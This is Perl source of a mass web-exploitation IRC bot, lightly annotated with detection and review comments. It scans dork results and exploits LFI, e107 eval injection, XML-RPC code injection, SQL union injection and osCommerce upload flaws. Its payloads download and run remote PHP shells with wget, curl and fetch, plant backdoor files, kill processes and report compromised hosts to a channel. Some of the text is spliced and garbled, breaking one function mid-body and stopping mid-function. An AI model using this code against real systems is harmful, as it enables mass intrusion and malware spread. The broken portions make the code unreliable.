# Local-file-inclusion scan over a list of search results.
#   $_[0] channel to report to, $_[1] vulnerable path/parameter ("bug"),
#   $_[2] search string, $_[3] search-engine name
# search_engine(), get_content() and msg() are defined outside this view.
# Analyst note: the requests built here carry "/proc/self/environ" and a
# trailing "%0000" behind a run of "../" - both are high-signal strings for
# web-server log searches and WAF rules. Host artefacts named in the payloads:
# /tmp/ewec, /tmp/dev, /tmp/ikal, images.php, cukz.php, detu.php.
sub lfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
# The "Scan finish" notice is sent when the second-to-last site is reached.
if ($count == $num-1) { &msg("$chan","$lfilogo 4$engine 0 Scan finish"); }
my $dir = "../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
my $vuln = "http://".$site."12".$bug.$dir."/proc/self/environ%0000";
my $shell = "http://".$site."12".$bug.$dir."/tmp/ewec%0000";
my $html = &get_content($test);
# A response containing process-environment variable names means the
# target returned /proc/self/environ through the include.
if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
# Double fork so the follow-up runs in a detached grandchild.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
# PHP snippet that prints host/user details between "c0li#" markers and
# copies the configured remote files into /tmp on the target.
my $code = 'echo "c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.$injector.'","/tmp/ewec")) { echo "SUCCESS";@copy("'.$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/ikal"); }';
my $res = lfi_env_query($test,encode_base64($code));
&lfi_spread_query($test);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");
&get_content("http://".$site.$bug.$dir."/tmp/ikal%0000");
$res =~ s/\n//g;
# Markers plus "SUCCESS": report the resulting URL to the channel.
if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
my $sys = $1;
$nob0dy = $2;
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@9".$sys."15))15(4@9$nob0dy15)");sleep(2);
}
elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
# Markers without "SUCCESS": second attempt through shell commands.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
$nob0dy = $2;
# Note the payload also kills all perl and php processes on the target.
my $upload = 'system("killall -9 perl;killall -9 php;wget '.$injector.' -O images.php;fetch '.$injector.';mv ewec.jpg images.php;wget '.$botshell.' -O cukz.php;fetch '.$botshell.';mv lovie.jpg cukz.php;wget '.$botshell2.' -O detu.php;fetch '.$botshell2.';mv logi.jpg detu.php;");passthru("killall -9 perl;killall -9 php;wget '.$injector.' -O images.php;fetch '.$injector.';mv ewec.jpg images.php;wget '.$botshell.' -O cukz.php;fetch '.$botshell.';mv lovie.jpg cukz.php;wget '.$botshell2.' -O detu.php;fetch '.$botshell2.';mv logi.jpg detu.php;");';
my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
my $check = &get_content("http://".$site.$bug.$dir."/tmp/ewec%0000"); sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/ikal%0000");sleep(2);
# "ZITH" in the response is the sample's success marker; results go to the
# channel and to the admin nick.
if ($check =~ /ZITH/) {
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
&msg("$admin","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
}
else {
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SysTem15)7 ".$vuln." 15(4@3".$sys."15))15(4@9$nob0dy15)");sleep(2);
}
} exit; }
}
else { &msg("$chan","$lfilogo(4@3$engine15)15(4@9EnviRon15)10 ".$vuln); }
} exit; } sleep(2);
}
}
}
}

# Send one GET request to $url and return the response body.
#   $_[0] URL, $_[1] base64-encoded code from the caller
# As shown here, $code is read but not referenced again, and the request
# goes out with an empty User-Agent string and a 7-second timeout.
# NOTE(review): text may have been lost from this page during extraction -
# compare with an intact copy of the sample before relying on this.
# Analyst note: an empty User-Agent combined with "/proc/self/environ" in the
# request URI is a useful log-search pairing.
sub lfi_env_query() {
my $url = $_[0];
my $code = $_[1];
my $ua = LWP::UserAgent->new(agent => "");
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}

# Build a propagation payload and send one GET request to $url.
#   $_[0] URL
# $code is a PHP system() call that, in /tmp and /var/tmp, tries four
# download tools in turn (fetch, wget, curl, lwp-download) for the two
# configured remote files, runs lovie.jpg / logi.jpg with the php binary and
# deletes them afterwards. As shown here, $code is built but not attached to
# the request, and the response is discarded.
# NOTE(review): text may have been lost from this page during extraction.
# Analyst note: host-side signs are php executing *.jpg files from /tmp or
# /var/tmp and a web-server user spawning fetch/wget/curl/lwp-download.
sub lfi_spread_query() {
my $url = $_[0];
my $code = "system('cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;wget ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;curl -O ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;lwp-download ".$botshell.";php lovie.jpg;fetch ".$botshell2.";php logi.jpg;rm -rf logi.jpg;wget ".$botshell2.";php logi.jpg;rm -rf logi.jpg;curl -O ".$botshell2.";php logi.jpg;rm -rf logi.jpg;lwp-download ".$botshell2.";php logi.jpg;cd /var/tmp;fetch ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;wget ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;curl -O ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;lwp-download ".$botshell.";php lovie.jpg;fetch ".$botshell2.";php logi.jpg;rm -rf logi.jpg;wget ".$botshell2.";php logi.jpg;rm -rf logi.jpg;curl -O ".$botshell2.";php logi.jpg;rm -rf logi.jpg;lwp-download ".$botshell2.";php logi.jpg;rm -rf *.jp*;');";
my $ua = LWP::UserAgent->new(agent => "");
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
}

sub e107() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$e107logo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
my $html = &e107_rce_query($test,$code);
if ($html =~ /v0pCr3w
sys:(.+?)
nob0dyCr3w/) {
&e107xpl1($chan,$site,$engine);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
my $upload = 'if(@copy("'.$injector.'","images.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","cukz.php");@copy("'.$botshell2.'","detu.php");} elseif(@copy("'.$injector.'","e107_themes/images.php")) { echo "ewec_dthem";@copy("'.$botshell.'","e107_themes/cukz.php");@copy("'.$botshell2.'","e107_themes/detu.php");} elseif(@copy("'.$injector.'","e107_plugins/images.php")) { echo "ewec_dplug";@copy("'.$botshell.'","e107_plugins/cukz.php");@copy("'.$botshell2.'","e107_plugins/detu.php");} elseif(@copy("'.$injector.'","e107_images/images.php")) { echo "ewec_dima";@copy("'.$botshell.'","e107_images/cukz.php");@copy("'.$botshell2.'","e107_images/detu.php");}';
my $res = &e107_rce_query($test,encode_base64($upload));
if ($res =~ /c0liSUKSESc0li/) {
&get_content("http://".$site."cukz.php");
&get_content("http://".$site."detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /ewec_dthem/) {
&get_content("http://".$site."e107_themes/cukz.php");
&get_content("http://".$site."e107_themes/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_themes/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_themes/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /ewec_dplug/) {
&get_content("http://".$site."e107_plugins/cukz.php");
&get_content("http://".$site."e107_plugins/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_plugins/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_plugins/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /ewec_dima/) {
&get_content("http://".$site."e107_images/cukz.php");
&get_content("http://".$site."e107_images/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_images/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$site."e107_images/4images.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
&e107_spread_query($test);
sleep(2);
} exit; } sleep(2);
}
elsif ($html =~ /v0pCr3w
sys:(.+?)
/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
my $upload = 'if(@copy("'.$injector.'","images.php")) { echo "c0liSUKSESc0li";@copy("'.$botshell.'","cukz.php");@copy("'.$botshell2.'","detu.php");} elseif(@copy("'.$injector.'","e107_themes/images.php")) { echo "ewec_dthem";@copy("'.$botshell.'","e107_themes/cukz.php");@copy("'.$botshell2.'","e107_themes/detu.php");} elseif(@copy("'.$injector.'","e107_plugins/images.php")) { echo "ewec_dplug";@copy("'.$botshell.'","e107_plugins/cukz.php");@copy("'.$botshell2.'","e107_plugins/detu.php");} elseif(@copy("'.$injector.'","e107_images/images.php")) { echo "ewec_dima";@copy("'.$botshell.'","e107_images/cukz.php");@copy("'.$botshell2.'","e107_images/detu.php");}';
my $res = &e107_rce_query($test,encode_base64($upload));
if ($res =~ /c0liSUKSESc0li/) {
&e107xpl1($chan,$site,$engine);
&get_content("http://".$site."cukz.php");
&get_content("http://".$site."detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."4images.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /ewec_dthem/) {
&get_content("http://".$site."e107_themes/cukz.php");
&get_content("http://".$site."e107_themes/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."e107_themes/4images.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /ewec_dplug/) {
&get_content("http://".$site."e107_plugins/cukz.php");
&get_content("http://".$site."e107_plugins/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."e107_plugins/4images.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /ewec_dima/) {
&get_content("http://".$site."e107_images/cukz.php");
&get_content("http://".$site."e107_images/detu.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$site."e107_images/4images.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
} exit; } sleep(2);
}
}
}
}

# Sends one POST to $url whose author_name form field wraps
# eval(base64_decode('<code>')) in an e107 [php] BBCode tag, and returns the
# raw response body.
#   $_[0]  target URL
#   $_[1]  base64 text placed inside base64_decode('...')
# $uagent is a file-level variable that is not visible in this section.
# Detection: a contact-form POST carrying "send-contactus=1" together with a
# "[php]" tag and "eval(base64_decode(" in author_name is the request shape to
# match in web-server or WAF logs.
sub e107_rce_query() {
my $url = $_[0];
my $code = $_[1];
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
# The trailing "%3Bdie%28%29%3B%5B%2Fphp%5D" is the URL-encoded text
# ";die();[/php]", which closes the tag after the injected expression.
$req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
my $ua = LWP::UserAgent->new(agent => $uagent);
# Short timeout: the scanner gives up on a slow host after 7 seconds.
$ua->timeout(7);
my $res = $ua->request($req);
# The body is returned even on HTTP errors; callers pattern-match it for
# marker strings.
return $res->content;
}

# Same request shape as e107_rce_query, but with a fixed, hard-coded base64
# blob as the payload and with the opening "[php]" tag URL-encoded (%5Bphp%5D).
#   $_[0]  target URL
# The response is stored in $res and never inspected.
# NOTE(review): the blob's decoded content is not shown on this page; treat it
# as an opaque sample artifact and decode it only in an isolated analysis
# environment. The literal string is usable as a static signature for this
# sample.
sub e107_spread_query() {
my $url = $_[0];
my $code = "7ZPfasIwFMbvB3uHGAamMqv7c2XnEPYAe4FBadMTW5cmIUmtMnz3JWmrDASZsLvdpef7vt85JKdAS4nwdq7e9FP7kutXnNzeQCiavVngWJUqbURWA4liPBjuaF0scbAJmc+LvU8ntEAzW6tE12iqGSqkjidoEm/UOp4kDCwtUWmtWsxmn1Jbl46pmOW58SHvSlwvNJx7yPDZrsFen6aN5mj6fj2At2payFZwmRW/oPgb2Wb6/1Z+UMIGgYF1U/k9gh3x+xQlYZ9OgnOxRlBbSYGCh0H05ZIaDFqi8djpFUNkBLWy+072esXIEEthVxlryBh2QMdBXfljMN97UJQcgRtZCYI/BD4KB/cncAPngKYEztMTtmesTvVuoAuUvbFQ94PJPDU205b40KqTjpCB70zuyVMqhQXhEMHriiCKlHLIBLnQUmXG2FI3Z5sO4h+0lQpEf1XME0OhewessU+3ZcWBjFYMJOtfE32hMEHsAkxDVnSBh/njc5Sgg5+YcmmA3LHQ31U02EaLEPOVbw==";
my $req = HTTP::Request->new(POST => $url);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
# $uagent is a file-level variable that is not visible in this section.
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $res = $ua->request($req);
}

# Scan driver for the XML-RPC check: collects candidate sites from
# search_engine(), requests site+bug for each one, and follows up on any site
# whose response contains "faultCode".
#   $_[0] IRC channel for status lines   $_[1] path appended to each site
#   $_[2] search query ("dork")          $_[3] search engine label
# Results are reported with msg(); nothing is returned.
# Detection: the follow-up fetches of images.php, cukz.php and detu.php in the
# web root right after an XML-RPC POST are a recognisable sequence in access
# logs.
sub xml() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
# "Scan finish" is announced when the counter reaches $num-1, i.e. one site
# before the end of the list.
if ($count == $num-1) { &msg("$chan","$xmllogo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $vuln = "http://".$site."13".$bug;
my $html = &get_content($test);
if ($html =~ /faultCode/ ) {
# Double fork: the parent waits for the first child, which forks again and
# exits at once, so the grandchild does the work detached from the scan loop.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $resp = &xml_cek_query($test);
# The probe brackets its output with the marker "j13mb0t"; a match means the
# injected code ran on the remote host.
if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
&xml_spread_query($test);sleep(2);
my $sys = $1;
my $check = &get_content("http://".$site."images.php");
&get_content("http://".$site."cukz.php");
&get_content("http://".$site."detu.php");
# "ZITH" is the string this bot looks for to confirm that images.php is now
# being served by the target.
if ($check =~ /ZITH/) {
&msg("$chan","$xmllogo4$engine 9SheLL 13 http://".$site."7images.php 3".$sys);&get_content("http://".$site."cukz.php"); sleep(2);}
else {
&msg("$chan","$xmllogo 4$engine 11checking.. 7 ".$vuln." 3".$sys); sleep(2);}
}
sleep(2); } exit; } }
}
}
}

# Probe request for the XML-RPC check: POSTs a text/xml body that tries to run
# "uname -a" on the target and returns the raw response body.
#   $_[0]  target URL
# The output is bracketed with the marker "j13mb0t" so the caller can extract
# it.
# NOTE(review): the payload shown here contains no XML markup; the tags were
# presumably stripped when this page was extracted. Confirm against an
# original sample before writing a body-content signature.
# Detection: the fixed User-Agent "perl post" and the marker string are both
# matchable in request logs.
sub xml_cek_query() {
my $url = $_[0];
my $code = "system('uname -a');";
my $ua = LWP::UserAgent->new(agent => 'perl post');
# $exploit is not declared with my, so it is a package global shared with
# every other sub that assigns it.
$exploit = "";
$exploit .= "test.method";
$exploit .= "',''));";
$exploit .= "echo'j13mb0t';".$code."echo'j13mb0t';exit;/*";
$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
return $res->content;
}

# Second-stage request for the XML-RPC check: POSTs a text/xml body whose
# injected command chain downloads the files named by $injector, $botshell and
# $botshell2 (file-level variables not visible in this section) and runs them
# with php.
#   $_[0]  target URL
# The response is discarded.
# Host-side indicators visible in the command string:
#   - images.php, cukz.php and detu.php created in the web root
#   - ewec.jpg, lovie.jpg and logi.jpg fetched into the web root, /tmp and
#     /var/tmp and executed with "php <file>.jpg"
#   - "killall -9 perl" and "killall -9 php", which also terminate legitimate
#     processes on the host
#   - every download attempted in turn with fetch, wget, curl and lwp-download
# NOTE(review): as in xml_cek_query, the XML markup appears to be missing from
# the payload on this page.
sub xml_spread_query() {
my $xmltargt = $_[0];
my $xmlsprd = "system('wget ".$injector." -O images.php;fetch ".$injector.";mv ewec.jpg images.php;wget ".$botshell." -O cukz.php;fetch ".$botshell.";mv lovie.jpg cukz.php;wget ".$botshell2." -O detu.php;fetch ".$botshell2.";mv logi.jpg detu.php;killall -9 perl;killall -9 php;cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;wget ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;curl -O ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;lwp-download ".$botshell.";php lovie.jpg;fetch ".$botshell2.";php logi.jpg;rm -rf logi.jpg;wget ".$botshell2.";php logi.jpg;rm -rf logi.jpg;curl -O ".$botshell2.";php logi.jpg;rm -rf logi.jpg;lwp-download ".$botshell2.";php logi.jpg;cd /var/tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;wget ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;curl -O ".$botshell.";php lovie.jpg;rm -rf lovie.jpg;lwp-download ".$botshell.";php lovie.jpg;fetch ".$botshell2.";php logi.jpg;rm -rf logi.jpg;wget ".$botshell2.";php logi.jpg;rm -rf logi.jpg;curl -O ".$botshell2.";php logi.jpg;rm -rf logi.jpg;lwp-download ".$botshell2.";php logi.jpg;');";
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
# $exploit is a package global (no my), shared with xml_cek_query.
$exploit = "";
$exploit .= "test.method";
$exploit .= "',''));";
# The markers differ from the probe ("j13m" / "b0T" rather than "j13mb0t").
$exploit .= "echo'j13m';".$xmlsprd."echo'b0T';exit;/*";
$userAgent->timeout(7);
$userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
}

# Scan driver for the SQL-error check: for every site returned by
# search_engine() it requests site+bug with a single quote appended and
# classifies the response by the database error text it contains.
#   $_[0] IRC channel   $_[1] path/parameter appended to each site
#   $_[2] search query  $_[3] search engine label
# Mitigation: every string matched below is a verbose database error echoed
# to the client. Suppressing error output and using parameterised queries
# removes the signal this check keys on.
sub sql() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$sqllogo(7@2$engine15)10 Scan finish"); }
# $test carries the trailing quote; $sqlsite is the same URL without it and
# is what gets passed on to sqlbrute.
my $test = "http://".$site.$bug."'";
my $vuln = "http://".$site."4".$bug;
my $sqlsite = "http://".$site.$bug;
# The page is fetched before forking; only the classification runs in the
# detached grandchild.
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
# MySQL-style error text: hand the site to sqlbrute.
if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
&sqlbrute($sqlsite,$chan,$engine);}
# Microsoft SQL Server error text: report only.
elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
&msg("$chan","$sqllogo(7@2$engine15)15(7@2MsSQL15)13 ".$vuln);}
# Access/JET error text: report only. The third alternative can never be the
# deciding match, because the shorter "Microsoft OLE DB Provider for" pattern
# in the branch above matches first.
elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
&msg("$chan","$sqllogo(7@2$engine15)15(7@2MsAccess15)13 ".$vuln);}
# PHP warnings that mention mysql_ functions: also handed to sqlbrute.
elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
&sqlbrute($sqlsite,$chan,$engine);}
# The sleep(2) after exit on the next line is never reached.
} exit; sleep(2); }
}
}
}
sub sqlbrute() {
my $situs=$_[0];
my $chan =$_[1];
my $engine=$_[2];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
{
$column ++;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
&msg("$chan","$sqllogo(7@2$engine15)15(7@2SQL15)13 $sql ");
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n");
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
&msg("$chan","$sqllogo(7@2$engine15)15(7@2SQL15)(7@13INFO_SCHEMA15)13 $sql ");
}
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
&msg("$chan","$sqllogo(7@2$engine15)15(7@2SQL15)(4@13USER15)13 $sql ");
}
else
{
}
while ($loadcont 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oscologo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/file_manager.php/login.php";
my $test2 = "http://".$site."admin/banner_manager.php/login.php";
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {
&msg("$chan","$oscologo 3$engine 11checking... 7 ".$test);
&osco_xpl($test,$chan,$site,$engine);
&osco2($test1,$chan,$bug,$dork,$engine);
&osco_xpl3($test2,$chan,$site,$engine);
&osql($chan,$site,$engine);
} else { }
} exit; sleep(2); }
}
}
}

# osCommerce upload step (products_image field): posts four multipart uploads
# to <url>?cPath=&action=new_product_preview and then checks whether the
# uploaded files are served from images/.
#   $_[0] base URL   $_[1] IRC channel   $_[2] site   $_[3] engine label
# Each upload reads a local file from the bot's working directory
# (./ewec.jpg, ./ikal.jpg, ./lovie.jpg, ./logi.jpg) and submits it under a
# .php filename (sonor.php, shure.php, cukz.php, detu.php).
# Detection: new .php files in the store's images/ directory with those
# names, and POSTs to admin pages requested as admin/<page>.php/login.php.
sub osco_xpl() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?cPath=&action=new_product_preview";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $res = $browser->post( $url,['products_image' => ['./ewec.jpg' => 'sonor.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resa = $browser->post( $url,['products_image' => ['./ikal.jpg' => 'shure.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resb = $browser->post( $url,['products_image' => ['./lovie.jpg' => 'cukz.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
my $resc = $browser->post( $url,['products_image' => ['./logi.jpg' => 'detu.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
# The four responses are stringified but never examined.
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
# Only the shure.php response is kept; the other two fetches just request
# the uploaded files once.
my $check = &get_content("http://".$site."images/shure.php");&get_content("http://".$site."images/cukz.php");&get_content("http://".$site."images/detu.php");sleep(3);
# "ZITH" is the banner text this bot expects from its own uploaded page.
if ($check =~ /ZITH/) {
my $safe ="";
my $os ="";
my $free ="";
# NOTE(review): the patterns below look truncated (a lazy group at the end of
# a pattern, or followed only by a line break); HTML tags were presumably
# lost when the page was extracted. $soft is a package global and is not used
# in the report.
if ($check =~ m/Software : (.*?)
/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)/) {$safe = $1;}
if ($check =~ m/OS : (.*?)
/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)/) {$free = $1;}
# The result goes both to the scan channel and to the hard-coded $admin nick.
&msg("$chan","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
&msg("$admin","$oscologo 4$engine 9SHeLL 13 http://".$site."images/4shure.php 9 15SafeMode= $safe 15OS= $os 15FreeSpace= $free15");sleep(2);
}
}

# Scan driver for the osCommerce file-manager check: a site qualifies when
# the page at site+bug contains "TABLE_HEADING_FILENAME".
#   $_[0] IRC channel   $_[1] path appended to each site
#   $_[2] search query  $_[3] search engine label
# Qualifying sites are passed to all three upload steps and to osql().
# Mitigation: each target is an admin script addressed as
# admin/<page>.php/login.php. Access control on the admin directory at the
# web-server level blocks these requests regardless of the application's own
# login check.
sub osco2() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$oscologo 4$engine 0 Scan finish"); }
my $test = "http://".$site.$bug;
my $test1 = "http://".$site."admin/banner_manager.php/login.php";
my $test2 = "http://".$site."admin/categories.php/login.php";
my $html = &get_content($test);
# Double fork so the follow-up work runs detached from the scan loop.
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ /TABLE_HEADING_FILENAME/) {
&msg("$chan","$oscologo 3$engine 11checking... 7 ".$test);
&osco_xpl2($test,$chan,$site,$engine);
&osco_xpl3($test1,$chan,$site,$engine);
&osco_xpl($test2,$chan,$site,$engine);
